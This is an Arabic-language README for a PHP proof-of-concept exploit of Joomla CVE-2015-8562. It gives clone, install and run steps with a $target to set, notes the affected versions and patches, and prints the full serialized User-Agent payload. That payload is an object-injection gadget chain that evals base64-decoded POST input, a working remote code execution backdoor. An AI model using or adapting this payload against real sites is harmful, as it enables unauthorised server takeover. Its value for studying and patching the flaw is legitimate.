
إثبات مفهوم لثغرة CVE-2015-8562 في Joomla
دليل إثبات لثغرة CVE-2015-8562 في Joomla
هذا الدليل هو نسخة شبه مطابقة لتطبيق Gary بلغة Python المستضاف على exploit-db.
من السهل جداً تثبيته:
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install
بعد أن يقوم composer بتثبيت كل شيء، ستحتاج إلى تغيير $target في exploit.php.
بعد ذلك ستكون جاهزاً للانطلاق:
php exploit.php
في ديسمبر 2015، تم اكتشاف ثغرة في Joomla. تسمح للمهاجمين عن بعد بتنفيذ هجمات حقن كائنات PHP وتنفيذ كود PHP عشوائي عبر رأس HTTP User-Agent.
أثرت هذه الثغرة على جميع إصدارات Joomla. تم إطلاق تصحيح للإصدارات v1.5.x و v2.5x و v3.x بالفعل هنا.
إذا كنت تستخدم PHP >= 5.4.45 أو >= 5.5.29 أو >= 5.6.13 فأنت بأمان، لأن هذا الاستغلال يستخدم أيضاً CVE-2015-6835.
قام Nikos Verschore من PatrolServer بكتابة تدوينة مفصلة جداً وكان له دور كبير في فهم هذه الثغرة. يمكنك استخدام الماسح المصغر الخاص بهم مجاناً للتحقق مما إذا كان موقعك معرضاً للخطر.
هذا ما يبدو عليه رأس User-Agent المرسل:
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
s:4:"\0\0\0a";
O:17:"JSimplepieFactory":0:{}
s:21:"\0\0\0disconnectHandlers";
a:1:{
i:0;
a:2:{
i:0;
O:9:"SimplePie":5:{
s:8:"sanitize";
O:20:"JDatabaseDriverMysql":0:{}
s:5:"cache";
b:1;
s:19:"cache_name_function";
s:6:"assert";
s:10:"javascript";
i:9999;
s:8:"feed_url";
s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
}
i:1;
s:4:"init";
}
}
s:13:"\0\0\0connection";
i:1;
}